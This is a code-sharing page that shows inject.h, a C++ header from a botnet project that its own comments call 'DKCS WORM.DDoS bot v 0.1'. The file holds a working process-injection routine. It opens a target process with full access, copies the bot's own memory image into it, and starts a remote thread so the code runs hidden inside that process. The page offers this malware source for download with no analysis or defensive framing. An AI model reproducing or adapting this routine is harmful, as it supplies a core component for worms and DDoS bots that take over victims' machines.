⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 inject.h

📁 dkcs_ddos_bot, written on VC++ 7.10 with admin panel on PHP (MqSQL as database server). Command
💻 H
字号:
//-----------------------------------------------------------------
// this file is a part of: DKCS WORM.DDoS bot v 0.1
// c0d3d by: Dr.Pixel
// 2006 (C) DKCS Security Team
//
// contacts:	e-mail:	dkcs@void.ru
//				icq:	7600278
//				web:	http://dkcs.void.ru
//				forum:	http://dkcs.net.ru
//-----------------------------------------------------------------
BOOL InjectCode(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam){

	HMODULE					hModule;
	LPVOID					hNewModule;
	DWORD					dwSize;
	HANDLE					hProcess;
	IMAGE_DOS_HEADER		ImageDosHeader;
	IMAGE_OPTIONAL_HEADER32	ImageOptionalHeader;

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
	if(hProcess == NULL){
		// MessageBox(0, "Process opening ERROR.", "System ERROR", 0);
		return FALSE;
	}
	hModule = GetModuleHandle(NULL);
	CopyMemory(&ImageDosHeader, hModule, sizeof(ImageDosHeader));
	CopyMemory(&ImageOptionalHeader, ((BYTE *)hModule + sizeof(DWORD) + ImageDosHeader.e_lfanew + sizeof(IMAGE_FILE_HEADER)), sizeof(ImageOptionalHeader));
	dwSize = ImageOptionalHeader.SizeOfImage;
	VirtualProtectEx(hProcess, hModule, dwSize, PAGE_EXECUTE_READWRITE, NULL);

	#pragma check_stack(off)
	hNewModule = VirtualAllocEx(hProcess, hModule, dwSize, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if(hNewModule == NULL){
		MessageBox(0, "Memory allocation ERROR.", "System ERROR", 0); // <- ! AHTUNG !
		return FALSE;
	}
	WriteProcessMemory(hProcess, hNewModule, hModule, dwSize, NULL);
	CreateRemoteThread(hProcess, NULL, 0x1000, lpStartProc, NULL, 0, NULL);
	#pragma check_stack(on)

return TRUE;
}
//-----------------------------------------------------------------

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -